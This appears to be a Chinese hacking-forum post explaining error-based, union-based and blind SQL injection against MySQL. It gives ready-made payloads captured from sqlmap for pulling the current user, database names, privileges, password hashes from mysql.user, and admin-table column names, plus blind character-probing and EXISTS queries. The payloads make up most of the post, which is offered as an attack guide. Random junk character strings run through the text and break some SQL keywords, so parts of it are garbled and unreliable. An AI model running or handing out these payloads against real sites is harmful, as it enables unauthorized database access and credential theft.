放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
. |( f. W& x) B2 s1 s + h* Y+ f6 ]# \# G0 O* h0 ^9 ^. D. x
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
# F/ ?1 c: J8 X: _6 J. g9 g
& \; P) ]* T6 y分类标准 分类 备注
9 E' z1 w: R4 j, `按字段类型 整型注入,字符型注入 6 J% T' P l2 W, J/ o3 q
按出现的位置 get注入,post注入,cookie注入,http header注入 5 _0 g7 f4 C! U* ?, s; w
然而高级注入是这样的 ?4 y1 `/ ~, e. ?3 Y
% C$ e9 k0 ]& E Q
高级注入分类 条件
4 K2 t( P; Z8 r serror-based sql 数据库的错误回显可以返回,存在数据库,表结构+ G9 j8 f$ E+ Q! U/ S4 a
union-based sql 能够使用union,存在数据库,表结构
9 @7 ?! n+ w& k, Hblind sql 存在注入
0 A# J3 r1 }' j8 ^3 r" E我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
- T2 M1 K4 g9 i+ T* ?& b 1 K* I9 f1 Z- n6 E4 ^% H
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火* v1 d& R6 o: ~, j* _
( W+ e, X/ \3 R% V6 A! x+ E附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
/ \5 F) i0 t% s4 b$ ?+ w
+ l6 p2 S! H8 {9 I8 ^. K1 ?这里用mysql说明. W2 K% x8 }# S9 }! ?
4 m y) M* R. ]7 c
e注入坛子里很多了,请看戳我或者再戳我5 Q" D: N0 A7 d0 S6 i/ T8 S& H
! N; Z2 H- y& [# I' j; ~4 s% Nu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的. u. L/ p6 b, _: Q ?7 g
; S3 H5 w2 h: P( V- T6 r1 l
获取当前数据库用户名4 U- |$ A4 p& z; K4 Q& d( S; X0 o
) m; S$ d' T5 ]1 T% o$ C7 |
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C, r; D0 Z, g; C2 Z, K
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
" w0 i8 o! u8 `+ t& IL, NULL#- Y |. _+ d1 U7 K0 P
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
7 m/ u, |% G+ S( H$ p1 V& S$ _4 h ' p$ C( _9 m- Y% G) k
获取数据库名
: B* m: ?. v! y `0 D1 O/ B& i( Y$ [
0 `( y) U- e: L, M4 b2 EUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#- ?+ x8 m" v& w( o
获取所有用户名
! Q; E* F# o% t9 k' j# U3 \
* e- ~4 h) x; zUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
) A: \* r$ |, X) E- v$ W4 c查看当前用户权限4 g4 _) I9 t/ f& T7 U1 R1 r
, c* a8 K4 W& }4 F2 w% @UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES## N, H. Y8 T3 G" J, T9 S) f. m `. q2 j
尝试获取密码,当然需要有能读mysql数据库的权限
. Z; U! |: p) U% M& T7 j8 D! U
# @- r* B7 x) l) VUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#" C; m5 ]4 t9 Q" z4 T* [3 l
获取表名,limit什么的自己搞啦
0 J9 F8 V+ W! ?, g2 t
/ E+ o+ X8 y$ F B: j2 wUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
% c5 K: C# s( a. b! l! ~4 S3 E获取字段名及其类型
: [! ?2 w7 X7 fUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#6 g l5 ~( @2 q. h
* D& w" S* J: c |5 `$ v
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。) Y0 e/ V9 w# i9 }/ Q7 J
5 ]- p# _3 v @7 Q O6 g J* p) K如:) ~# z7 F9 M" \
获取当前用户名7 Z! }% D+ U- C
* L$ u7 p4 I/ i8 v, f6 A! v
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
3 d! y1 @" @2 y( a8 `. I4 ?获取当前数据库, V; B/ b4 j6 \
) ^9 i% g6 y' e# nAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
' V( x, X, s( r7 [9 a获取表名
2 a- i' z2 |- ~( [; l8 p " X8 _* `& s) e& @
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 514 L$ T0 Z, P! |
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
+ P' v, j" H0 r: ~6 P+ y7 s! R& G回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。 _, p( N5 `* U" o( H; E7 C z& ]
爆表
. V0 t# n f/ u5 Q
$ h1 i' O, M$ F$ oAND EXISTS(select * from table)
* }9 c$ O4 \6 d0 r( I! c爆字段2 T: N& n, [/ R% r- U
8 Q0 `: j6 \& z! P i2 ^' n- JAND EXISTS(select pwd from table)5 L+ D; [* i6 r& O
盲注的变化就比较多了,由于篇幅,只是举个例子而已。
6 a) Y% T4 W1 F8 \; [
4 M- `& D" G' q7 t9 T本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
" t' ~& p) g: i1 O- z: \ |